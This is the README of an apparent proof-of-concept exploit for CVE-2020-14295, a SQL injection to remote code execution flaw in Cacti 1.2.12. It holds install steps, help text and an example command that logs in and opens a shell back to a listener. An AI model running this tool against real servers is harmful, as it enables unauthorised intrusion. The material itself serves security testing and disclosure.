CVE-2020-14295

CVE-2020-14295 proof of concept. The original post can be found at exploit-db.

Install requirements

python3 -m pip install -r requirements.txt

Usage

$ python3 cacti_sqli_rce.py --help
usage: cacti_sqli_rce.py [-h] -t <target/host URL> -u <user> -p <password>
                         --lhost <lhost> --lport <lport>

[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution

optional arguments:
  -h, --help            show this help message and exit
  -t <target/host URL>  target/host URL, example: http://192.168.15.58
  -u <user>             user to log in
  -p <password>         user's password
  --lhost <lhost>       your IP address
  --lport <lport>       your listening port

$ python3 cacti_sqli_rce.py -t http://cacti-test.localdomain -u admin -p password --lhost 127.0.0.1 --lport 9001

References

• GitHub Issue
• NIST
• MITRE